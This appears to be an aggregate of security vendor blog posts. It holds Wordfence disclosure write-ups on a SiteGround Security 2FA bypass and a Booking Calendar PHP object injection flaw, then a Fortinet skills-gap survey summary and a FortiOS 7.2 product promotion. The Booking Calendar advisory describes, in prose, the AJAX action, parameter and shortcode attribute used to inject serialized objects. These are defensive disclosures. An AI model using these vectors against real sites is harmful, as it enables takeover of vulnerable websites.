March 10, 2022 – Conclusion of the plugin analysis that led to the discovery of two Authentication Bypass Vulnerabilities in the “SiteGround Security” WordPress plugin. We deploy firewall rules to protect Wordfence Premium, Wordfence Care, and Wordfence Response users. We send the full disclosure details to SiteGround in accordance with their responsible disclosure policy. March 11, 2022 – The CTO of SiteGround responds indicating that a patch has been released. We review the patch and inform them that it is insufficient. They release an additional patch. March 11, 2022 – A patched version of the plugin is released as version 1.2.3. We suggest further security enhancements to the functionality. March 16, 2022 – An update is made that reduces the security of the 2FA functionality, we follow-up again to suggest better security enhancements to the functionality. The CTO assures us that they are working on it. April 6, 2022 – A fully and optimally patched version of the plugin is released as version 1.2.6. April 9, 2022 – Wordfence Free users receive the firewall rules.
Conclusion
In today’s post, we detailed a flaw in the “SiteGround Security” plugin that made it possible for unauthenticated attackers to gain access to administrative user accounts in instances where 2-Factor Authentication was enabled, though not yet fully set up, and in cases where an attacker could successfully brute force a back-up code. This could easily be used by an attacker to completely compromise a site. This flaw has been fully patched in version 1.2.6.
We strongly recommend ensuring that your site has been updated to the latest patched version of “SiteGround Security”, which is version 1.2.6 at the time of this publication.
Wordfence Premium, Wordfence Care, and Wordfence Response received a set of firewall rules on March 10, 2022 to provide protection against attempts by attackers to exploit this vulnerability. Wordfence Free users will receive this same protection 30 days later on April 9, 2022
If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both Wordfence Care and Wordfence Response include hands-on security support that provide you with ongoing assistance from our incident response team, should you need it.
Special thanks to the team at SiteGround, for responding swiftly and working quickly to get a patch out to protect their customers and working to further secure the 2FA component.
On April 18, 2022, the Wordfence Threat Intelligence team initiated the responsible disclosure process for an Object Injection vulnerability in the Booking Calendar plugin for WordPress, which has over 60,000 installations.
We received a response the same day and sent over our full disclosure early the next day, on April 19, 2022. A patched version of the plugin, 9.1.1, was released on April 21, 2022.
We released a firewall rule to protect Wordfence Premium, Wordfence Care, and Wordfence Response customers on April 18, 2022. Sites still running the free version of Wordfence will receive the same protection on May 18, 2022. We recommend that all Wordfence users update to the patched version, 9.1.1, as soon as possible as this will entirely eliminate the vulnerability.
The Booking Calendar plugin allows site owners to add a booking system to their site, which includes the ability to publish a flexible timeline showing existing bookings and openings using a shortcode, [bookingflextimeline].
The flexible timeline includes the ability to configure viewing preferences and options when viewing the published timeline. Some of these options were passed in PHP’s serialized data format, and unserialized by the define_request_view_params_from_params function in core/timeline/v2/wpbc-class-timeline_v2.php.
An attacker could control the serialized data via several methods:
If a timeline was published, an unauthenticated attacker could obtain the nonce required to send an AJAX request with the action set to WPBC_FLEXTIMELINE_NAV and a timeline_obj[options] parameter set to a serialized PHP object.
Any authenticated attacker could use the built-in parse-media-shortcode AJAX action to execute the [bookingflextimeline] shortcode, adding an options attribute in the shortcode set to a serialized PHP object. This would work even on sites without a published timeline.
An attacker with contributor-level privileges or above could also embed the [bookingflextimeline] shortcode containing a malicious options attribute into a post and execute it by previewing it, or obtain the WPBC_FLEXTIMELINE_NAV nonce by previewing the [bookingflextimeline] shortcode and then using method #1.
Any time an attacker can control data that is unserialized by PHP, they can inject a PHP object with properties of their choice. If a “POP Chain” is also present, it can allow an attacker to execute arbitrary code, delete files, or otherwise destroy or gain control of a vulnerable website. Fortunately, no POP chain was present in the Booking plugin, so an attacker would require some luck as well as additional research in order to exploit this vulnerability. Nonetheless, POP chains appear in a number of popular software libraries, so many sites could still be exploited if another plugin using one of these libraries is installed.
Despite the lack of a POP chain and the complexity involved in exploitation, the potential consequences of a successful attack are so severe that object injection vulnerabilities still warrant a “High” CVSS score. We’ve written about Object Injection vulnerabilities in the past if you’d like to find out more about how they work.
Timeline
April 18, 2022 – We release a firewall rule to protect Wordfence Premium, Care, and Response customers. We initiate the disclosure process. The plugin developer verifies the contact method. April 19, 2022 – We send the full disclosure to the plugin developer. April 21, 2022 – A patched version of the Booking Calendar plugin, 9.1.1, is released. May 18, 2022 – The firewall rule becomes available to free Wordfence users.
Conclusion
In today’s post, we covered an Object Injection vulnerability in the Booking Calendar plugin. Wordfence Premium, Wordfence Care, and Wordfence Response customers are fully protected from this vulnerability. Sites running the free version of Wordfence will receive the same protection on May 18, 2022, but have the option of updating the Booking calendar plugin to the patched version 9.1.1 to eliminate the risk immediately.
If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.
Closing the cybersecurity skills gap has been a topic of interest for a number of years with many organizations reporting on its slow decline. According to (ISC)2’s 2021 Cyber Workforce Report, the global cybersecurity workforce needs to grow 65 percent to effectively defend organizations’ critical assets. While the number of professionals needed to fill the gap has decreased from 3.12 million down to 2.72 million in the past year, this is still a significant void that leaves organizations vulnerable.
Organizations are looking for individuals with certified skills
Organizations are looking for more diversity
Raising cybersecurity awareness remains a key challenge
The survey was conducted in January and February of 2022 and included more than 1200 IT and cybersecurity decision-makers from 29 different locations. There was an even split between the respondents in four regions: North America, EMEA, APAC and LATAM.
How Cybersecurity and the Skills Gap Affects Every Organization
A staggering 80% of organizations experienced at least one breach during the last 12 months that they could attribute to a lack of cybersecurity skills and/or awareness. Almost 20% suffered five or more breaches.Number of breaches in the last 12 months
If that weren’t enough, 64% of organizations experienced breaches that resulted in lost revenue and/or cost them fines. Of those, 38% reported breaches that cost them more than a million dollars (USD).
How is the Skills Gap Creating Cyber Risk?
According to the survey respondents, a key factor contributing to the breaches is that organizations struggle to find and retain certified cybersecurity people. 67% of global leader respondents indicate that the skills shortage creates additional cyber risks for their organization.
Recruitment and Retention Are Key Challenges Causing the Skills Gap
Organizations need qualified cybersecurity professionals now more than ever, which is why 76% of organizations indicate that their board of directors now recommend increases in IT and cybersecurity headcount.Board members who recommend increases in IT and cybersecurity headcount
Most would hope that increasing hiring could be an easy fix to this problem, however, 60% of organizations indicated that they struggle to recruit cybersecurity talent and 52% struggle to retain it.
Another key challenge for recruitment is the that organizations need to hire people for a broad range of security and IT network-related roles and specializations. Cloud security specialist and security operations (SOC) analysts remain among the most sought-after roles in cybersecurity, followed closely by security administrators and architects. But organizations aren’t just looking to ramp up hires arbitrarily. They’re deliberately trying to build teams of specialized talent who are equipped to handle an increasingly complex threat landscape.
Finding Qualified People is a Challenge for the Skills Gap
Globally, 50% of organizations seek cloud security specialists, a priority that’s likely informed by how rapidly companies moved their operations to the cloud during the pandemic.
The challenge is finding the right people.What roles are organizations looking for?
What Skills Are Needed to Work in Cybersecurity?
Central to the challenge of recruiting and retaining cybersecurity talent is the importance of certification. Certified professionals are universally sought after with 95% of decision-makers sharing that technology-focused certifications positively impact both their role and their team.
Organizations Are Looking for Certified Skills
As such, 81% of leaders prefer to hire people with certifications.
However, 78% indicate it’s hard to find certified people. This may contribute to the fact that globally 91% of organizations say they are willing to pay for an employee to achieve a cybersecurity certification.Organizations would pay for an employee to get a cybersecurity certification
The preference to hire certified people may be because organization leaders followed that same path themselves:
86% of decision-makers report having earned technology-focused certifications
88% report having other people with certificates on their team
Certification is an Opportunity Given the Skills Gap
It should also be noted from above that global leaders attributed the struggle to find and retain certified cybersecurity people as a key factor contributing to breaches. This also may influence an organization’s hiring strategy with a tendency to lean towards professionals with corresponding certifications to the positions they are attempting to fill.
Closing the Cybersecurity Skills Gap by Prioritizing Diversity
The challenge isn’t just hiring more people, but also building more capable and more diverse teams. While enterprises need qualified talent for a range of different roles, 89% of global companies also have explicit diversity goals as part of their hiring plan.
7 out of 10 leaders worldwide say hiring women and new graduates are among their top three challenges. 61% say hiring minorities is also a top three challenge.
Despite the challenges, or perhaps because of it, three out of four organizations implemented formal processes to hire more women, and nine out of 10 actively engaged women and new graduates during the last three years. 59% of companies have structures in place to hire minorities, and 51% for hiring more veterans.Hiring from these populations is a top three challenge for organizations
Raising Cybersecurity Awareness to Close the Skills Gap
Even though the recruitment, retention, and certification of a cybersecurity team is vital, companies cannot realistically protect themselves until they also raise the cyber awareness of all employees. That requires ensuring that all employees, at all levels and all roles within the organization, have the knowledge and awareness to protect themselves and their organization’s data. Until they do, breaches will always be likely.
87% of organizations implemented a training program to increase cyber awareness. However, 52% of leaders continue to believe their employees still lack the necessary knowledge. This raises the question of the effectiveness of the programs that organizations currently have in place. Employees lack knowledge when it comes to cybersecurity awareness
For those that don’t have a program in place, 66% report they are currently looking for a program that would suit their needs.
The Power of People Can Help Close the Skills Gap
Cybersecurity can sometimes feel like a purely technological domain. But when you look past the technology that organizations rely on, cybersecurity is all about how well your employees work together to protect the organization.
Fortunately, organizations are making deliberate efforts to improve on all these fronts. However, it is imperative to remember that the cyber battle isn’t won on any one front. Cybersecurity requires an entire system of people and technology working together to protect an organization.
That starts with people who are empowered, qualified, and certified to protect the organization.
The Fortinet Security Fabric is the industry’s first—and only—platform to converge essential networking and security functions and consolidate security point products into a unified platform. And now, Fortinet has announced the release of FortiOS 7.2, which widens that leadership position even further. With over 300 new features spanning the Fortinet portfolio—including new advanced AI-powered services that accelerate the detection and response to threats—FortiOS is better positioned than ever to secure the hybrid networks that organizations rely on to compete in today’s digital marketplace.
Today’s Network Is Different, Not Dead
Too many organizations hear that everything is moving to the cloud. And that as a result, the traditional network will soon be dead. But nothing could be further from the truth. And worse, buying into that myth is putting organizations at risk.
Of course, networks are vastly different from just a few years ago. Digital acceleration has enabled users and devices to access critical resources from any location, fundamentally changing how businesses operate. But this need for consistent user experience does not require them to abandon their networks. Instead, organizations worldwide and across all industries are building hybrid networks that interconnect traditional data centers and campuses with multi-cloud infrastructures, SaaS platforms, branch offices, home offices, and mobile users and devices.
Brandon Butler, a Senior Research Analyst at IDC, recently stated, “The network is foundational for enabling secure, scalable, and efficient use of cloud, edge, and IoT applications.” So, rather than dying, hybrid networks are the enablers of digital acceleration. They allow applications and workflows to move seamlessly from end to end and be accessed by any user or device from any location.
However, organizations need to stop thinking about networking and security as separate strategies to do this effectively. Instead, securing their digital acceleration efforts requires infrastructure and security teams to converge their visions. As applications continue their cloud journey and devices become increasingly visible to everyone, secure networks are vital to connecting these domains.
But to do this, enterprises, small businesses, and service providers alike need to replace isolated point devices that only address a portion of the network with solutions designed to operate as part of an integrated fabric that can see and adapt to the broader network. As network edges and dynamic infrastructures evolve, single-purpose and isolated security solutions only make it more difficult for organizations to deploy and maintain a cohesive and comprehensive security strategy. Instead, organizations must adopt a platform approach that converges operational efficiency and security automation with the underlying network.
The Only Platform Designed to Fully Protect Today’s Hybrid Networks
The Fortinet Security Fabric is the only platform designed to fully protect and dynamically adapt to today’s hybrid networks at any edge, and FortiOS 7.2 is the heart of that platform. FortiOS enables organizations to deploy the Fortinet Security Fabric to every edge, allowing security to dynamically scale and adapt as the network evolves. This expansive, integrated approach also enables the delivery of AI-powered automation that correlates intelligence from across the network and global threat feeds to rapidly detect even the most sophisticated threats and respond in real time.
FortiOS 7.2 enhances the Security Fabric’s award-winning functions and services by extending the definition of what’s possible in networking and security, thereby enabling customers and partners to safely and effectively compete in today’s digital marketplace. And for the foreseeable future, those businesses will rely on hybrid networks. But only by integrating security at the core of those networks will they be able to adapt at speed and scale to secure every edge. Over 20 years of prioritizing research and development have positioned Fortinet as the driving force behind cybersecurity innovation. With FortiOS 7.2, Fortinet is setting new industry standards for converged networking and security. Figure 1. Fortinet’s Security Fabric platform converges essential networking and security functions and consolidates security point products into a unified platform
High-performance AI-powered threat intelligence and services
New AI-powered FortiGuard Security Services enable organizations to automate their security systems to stay ahead of never-before-seen attacks, in real-time. And one of the most significant enhancements is the speed and accuracy with which FortiOS 7.2 can detect and prevent threats, in a coordinated way across an organization’s extended attack surface.
Traditionally, performance-intensive activities like sandboxing suspicious files for out-of-band inspection resulted in a delay in delivering content or having to hunt down malware inside the network when a file turns out to be infected. FortiOS 7.2’s new inline sandbox service resolves this by transforming a traditional detection sandbox capability into real-time in-network prevention to stop both known and unknown malware, with minimal impact on operations. New inline CASB, dedicated IPS, advanced device protection for OT and IoT systems, and additional enhancements to our SOC services portfolio deliver advanced security services to improve our customers’ security postures. Because they are consumed as a service across the Fortinet Security Fabric and ecosystem, this guarantees real-time proactive updates with minimal impact to operations and simplified scaling. Additionally, our new outbreak detection service provides a faster response to outbreak attacks, including immediate alerts and threat hunting scripts that automatically identify and respond to new threats. In addition, all FortiGuard services are powered by trusted machine learning and artificial intelligence. Its accuracy and fidelity are further enhanced through FortiGuard Labs’ analysis of over 100 billion global security events a day observed in live production environments worldwide.
The critical convergence of networking and security
One of the most essential functions of a modern security solution is its ability to scale, span, and adapt to a continuously evolving hybrid network. Achieving this requires converging security with the network. Such convergence allows security systems to seamlessly adapt to network changes as it addresses continually evolving requirements. However, the challenge most organizations face is that few security solutions are genuinely able to provide this essential function.
Fortinet’s security-driven network approach was the first platform-based strategy to encompass the entire network development and deployment life cycle. Converging essential network and security functions ensures that security is the central consideration for all business-driven infrastructure decisions. As a result, new edges, applications, and services that expand your attack surface are automatically protected.
FortiOS 7.2 extends Fortinet’s innovation advantage even further by delivering new ways to converge networking and security across critical functions. New ZTNA enhancements make WFA deployments easier to deploy. Improvements to the industry’s most comprehensive portfolio of secure WAN edge solutions—SD-WAN, SD-Branch, 5G, and ZTNA—help teams achieve even better ROI. Advances in automation using new auto-deployment and zero-touch provisioning features increase uptime for the WAN and LAN Edge. And additional upgrades spread across NGFW, identity, micro-segmentation, SASE, AIOps and digital experience monitoring deliver powerful innovation for further networking and security convergence.
Consolidating security increases efficiency, visibility, and control
Organizations that have taken a best-of-breed approach to security now face the challenge of vendor and solution sprawl. So, in addition to converging network and security, organizations must also begin consolidating the security products deployed across their ever-expanding attack surface to improve visibility, centralize management, orchestrate policy, and automate rapid threat detection and real-time response.
FortiOS 7.2 provides enhancements across Fortinet’s entire portfolio of network, endpoint, and cloud solutions that further consolidate security point products into a single broad, integrated, and automated platform. This deeper integration enables advanced vulnerability correlation and virtual patching to provide more comprehensive protection, including better security for IoT devices and advanced process automation so NOC and SOC teams can further simplify and automate their workflows.
In addition to FortiOS, the Fortinet Security Fabric platform is also built around common standards and open APIs that enable organizations to build a robust cybersecurity mesh architecture that includes investments in other security technologies. The Fortinet Fabric-Ready Technology Alliance Partner Program, one of the largest technology alliance ecosystems in the industry, brings together a community of global technology partners with specialized expertise. As a result of more than 400 integrations, customers can now more easily build a hybrid platform of integrated solutions to improve security effectiveness, reduce complexity, and simplify operations.
Fortinet’s Industry Leadership Enables Advanced Security Strategies
Fortinet’s commitment to innovation has led to the world’s most extensive and deeply integrated security and networking solutions portfolio. Our 1,255 patents are nearly three times that of comparable cybersecurity companies. We also regularly submit our products for impartial testing with the most prominent organizations in the industry. Those consistently top-tier results, combined with annual accolades and awards from leading analysts and industry organizations, and a strong commitment to R&D based in the United States and Canada, assure customers they can take a consolidated approach to security without ever sacrificing performance or protection. https://www.youtube.com/embed/LN2glwJ6vyA?autoplay=0&rel=0&controls=0&showinfo=0
Find out how Fortinet remains a global leader in broad, integrated and automated cybersecurity solutions: Fortinet Innovation series.
Number of breaches in the last 12 months
Board members who recommend increases in IT and cybersecurity headcount
What roles are organizations looking for?
Organizations would pay for an employee to get a cybersecurity certification
Hiring from these populations is a top three challenge for organizations
Employees lack knowledge when it comes to cybersecurity awareness
Figure 1. Fortinet’s Security Fabric platform converges essential networking and security functions and consolidates security point products into a unified platform